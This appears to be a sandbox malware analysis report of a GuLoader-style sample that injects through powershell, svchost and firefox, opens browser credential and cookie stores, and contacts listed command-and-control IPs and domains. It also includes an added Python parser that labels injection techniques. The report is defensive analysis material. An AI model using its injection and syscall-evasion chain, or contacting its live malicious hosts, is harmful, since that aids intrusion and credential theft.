            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | NtTerminateThread: Direct from: 0x77377B2E
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe | Section loaded: NULL target: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe protection: read write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Thread register set: target process: 1096
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section unmapped: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe base address: 400000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe base: 1660000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe "C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe"
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\SysWOW64\svchost.exe"
            Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
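            Read together, the entries in this section describe one injection chain: powershell.exe starts Stemmeurnes.exe, unmaps its image at 400000, writes a payload at 1660000 and queues an APC into it (the "early bird" signature); Stemmeurnes.exe then maps RWX sections into MLvvJtVcRex.exe and svchost.exe; svchost.exe maps RWX sections into firefox.exe and rewrites a thread context in PID 1096. The "Direct from" entries show MLvvJtVcRex.exe issuing Nt* system calls from addresses that are not the ordinary ntdll export stubs, which is how GuLoader-style stagers get past user-mode API hooks; the report does not list ntdll's load range, so the addresses themselves cannot be interpreted further from this page alone. The script below is an added example written for this page, not Joe Sandbox code: it parses event lines of this section (transcribed into a normalised `Source: <process> | <event>` form) into per-edge injection labels and a per-process direct-syscall profile, and flags the process that issued the whole create / allocate / write / protect / resume chain as direct syscalls. The technique labels are the script's own heuristics, not the sandbox's.

```python
"""Build an injection graph and a direct-syscall profile from the evasion
section's event lines. Added example, not Joe Sandbox code: the lines below
are transcribed from the listing above into a "Source: <process> | <event>"
form, and the technique labels are this script's own heuristics."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
LOADER = r"C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe"
STAGE2 = r"C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe"
SVCHOST = r"C:\Windows\SysWOW64\svchost.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"

REPORT = [  # transcribed from the report; one representative line per event type / API
    f"Source: {PS} | Process created / APC Queued / Resumed: {LOADER}",
    f"Source: {STAGE2} | NtResumeThread: Direct from: 0x773836AC",
    f"Source: {STAGE2} | NtWriteVirtualMemory: Direct from: 0x77382E3C",
    f"Source: {STAGE2} | NtProtectVirtualMemory: Direct from: 0x77382F9C",
    f"Source: {STAGE2} | NtCreateUserProcess: Direct from: 0x7738371C",
    f"Source: {STAGE2} | NtAllocateVirtualMemory: Direct from: 0x77383C9C",
    f"Source: {LOADER} | Section loaded: NULL target: {STAGE2} protection: execute and read and write",
    f"Source: {LOADER} | Section loaded: NULL target: {SVCHOST} protection: execute and read and write",
    f"Source: {SVCHOST} | Section loaded: NULL target: {FIREFOX} protection: read write",
    f"Source: {SVCHOST} | Section loaded: NULL target: {FIREFOX} protection: execute and read and write",
    f"Source: {SVCHOST} | Thread register set: target process: 1096",
    f"Source: {PS} | Thread APC queued: target process: {LOADER}",
    f"Source: {PS} | Section unmapped: {LOADER} base address: 400000",
    f"Source: {PS} | Memory written: {LOADER} base: 1660000",
    f'Source: {PS} | Process created: {LOADER} "{LOADER}"',
    f'Source: {STAGE2} | Process created: {SVCHOST} "{SVCHOST}"',
    f'Source: {SVCHOST} | Process created: {FIREFOX} "{FIREFOX}"',
]

PATTERNS = {  # event kind -> regex over the text after " | "
    "direct_syscall": re.compile(r"^(?P<api>Nt\w+): Direct from: 0x(?P<addr>[0-9A-Fa-f]+)$"),
    "early_bird": re.compile(r"^Process created / APC Queued / Resumed: (?P<dst>.+)$"),
    "section_map": re.compile(r"^Section loaded: NULL target: (?P<dst>.+?) protection: (?P<prot>.+)$"),
    "context": re.compile(r"^Thread register set: target process: (?P<dst>.+)$"),
    "apc": re.compile(r"^Thread APC queued: target process: (?P<dst>.+)$"),
    "unmap": re.compile(r"^Section unmapped: (?P<dst>.+?) base address: (?P<base>[0-9A-Fa-f]+)$"),
    "write": re.compile(r"^Memory written: (?P<dst>.+?) base: (?P<base>[0-9A-Fa-f]+)$"),
    "create": re.compile(r'^Process created: (?P<dst>.+?) "(?P<cmd>[^"]*)"$'),
}
RULES = [  # primitives that must all be present on a (source, target) edge -> label
    ({"section_map_rwx"}, "cross-process RWX section mapping"),
    ({"apc"}, "APC injection (early bird)"),
    ({"unmap", "write", "create"}, "process hollowing"),
    ({"context"}, "thread context hijack"),
]
# create-suspended / allocate / write / protect / resume, each issued as a direct syscall
HOLLOWING_CHAIN = {"NtCreateUserProcess", "NtAllocateVirtualMemory", "NtWriteVirtualMemory",
                   "NtProtectVirtualMemory", "NtResumeThread"}

@dataclass
class Event:
    kind: str
    src: str
    fields: Dict[str, str]

def parse(lines: List[str]) -> List[Event]:
    events: List[Event] = []
    for line in lines:
        src, sep, text = line[len("Source: "):].partition(" | ")
        if not line.startswith("Source: ") or not sep:
            continue
        for kind, rx in PATTERNS.items():
            m = rx.match(text)
            if m:
                events.append(Event(kind, src, m.groupdict()))
                break
    return events

def injection_map(events: List[Event]) -> Dict[Tuple[str, str], List[str]]:
    """(source, target) -> technique labels, from the primitives that hit the target."""
    prims: Dict[Tuple[str, str], Set[str]] = defaultdict(set)
    for e in events:
        if "dst" not in e.fields:
            continue
        if e.kind == "section_map":  # only an executable mapping carries injected code
            tags = {"section_map_rwx" if "execute" in e.fields["prot"] else "section_map_rw"}
        elif e.kind == "early_bird":  # one report line covering create + APC queue + resume
            tags = {"create", "apc"}
        else:
            tags = {e.kind}
        prims[(e.src, e.fields["dst"])] |= tags
    out = {edge: [label for need, label in RULES if need <= kinds] for edge, kinds in prims.items()}
    return {edge: labels for edge, labels in out.items() if labels}

def direct_syscalls(events: List[Event]) -> Dict[str, Set[str]]:
    """process -> Nt* APIs it issued without going through the normal ntdll stub."""
    prof: Dict[str, Set[str]] = defaultdict(set)
    for e in events:
        if e.kind == "direct_syscall":
            prof[e.src].add(e.fields["api"])
    return dict(prof)

def chain_via_direct_syscalls(profile: Dict[str, Set[str]]) -> List[str]:
    """Processes whose direct-syscall set covers the full hollowing chain."""
    return sorted(src for src, apis in profile.items() if HOLLOWING_CHAIN <= apis)
```

            Calling `injection_map(parse(REPORT))` yields one labelled edge per injecting process and target; the plain `Process created` edge from MLvvJtVcRex.exe to svchost.exe gets no label because this section carries no unmap or write event for it, while `chain_via_direct_syscalls(direct_syscalls(parse(REPORT)))` still singles out MLvvJtVcRex.exe as the process that drove the whole chain from syscalls the sandbox saw bypass ntdll. The two views are complementary: a hooked EDR would see the first set of events only if its hooks are in the monitored process, and the second only if it records the syscall origin, which is why the report keeps both.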
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll | VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll | VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll | VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll | VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll | VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll | VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll | VolumeInformation
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Code function: 0_2_0040604F GetVersion, GetSystemDirectoryW, GetWindowsDirectoryW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, CoTaskMemFree, lstrcatW, lstrlenW | 0_2_0040604F

            Stealing of Sensitive Information

            barindex
            Source: Yara match | File source: 00000008.00000002.4750377511.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3693581776.0000000022720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.4750102999.0000000001380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.4750333765.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3694238419.0000000022D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\svchost.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            barindex
            Source: Yara match | File source: 00000008.00000002.4750377511.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3693581776.0000000022720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.4750102999.0000000001380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.4750333765.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3694238419.0000000022D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            MITRE ATT&CK matrix (a number in front of a technique is the count the report attaches to that matched technique):

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 115 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | 1 Access Token Manipulation | 3 Obfuscated Files or Information | Security Account Manager | 321 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 611 Process Injection | 1 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 131 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 131 Virtualization/Sandbox Evasion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 611 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            [Behavior graph: ID 1564415, sample Salmebogs(1).exe, start date 28/11/2024, architecture WINDOWS, score 100. Information recovered from the graph:]
            Process chain: Salmebogs(1).exe starts powershell.exe; powershell.exe starts Stemmeurnes.exe and conhost.exe; Stemmeurnes.exe injects into MLvvJtVcRex.exe; MLvvJtVcRex.exe starts svchost.exe; svchost.exe injects into MLvvJtVcRex.exe and starts firefox.exe.
            Dropped files: C:\Users\user\AppData\...37euralgiform.Pre (Unicode) by Salmebogs(1).exe; C:\Users\user\AppData\...\Stemmeurnes.exe (PE32) and C:\Users\...\Stemmeurnes.exe:Zone.Identifier (ASCII) by powershell.exe.
            Network: Stemmeurnes.exe contacts 212.162.149.63 (49724, 80; UNREAL-SERVERSUS, Netherlands); the injected MLvvJtVcRex.exe contacts www.openhorizons.pro 69.57.163.64 (49730, 49731, 49732; FORTRESSITXUS, United States), carhireheaven.online 165.22.38.185 (49725, 80; DIGITALOCEAN-ASNUS, United States) and 4 other IPs or domains; www.topkapiescortg.xyz, www.openhorizons.pro and 7 other IPs or domains are resolved, with www.topkapiescortg.xyz flagged by "Performs DNS queries to domains with low reputation".
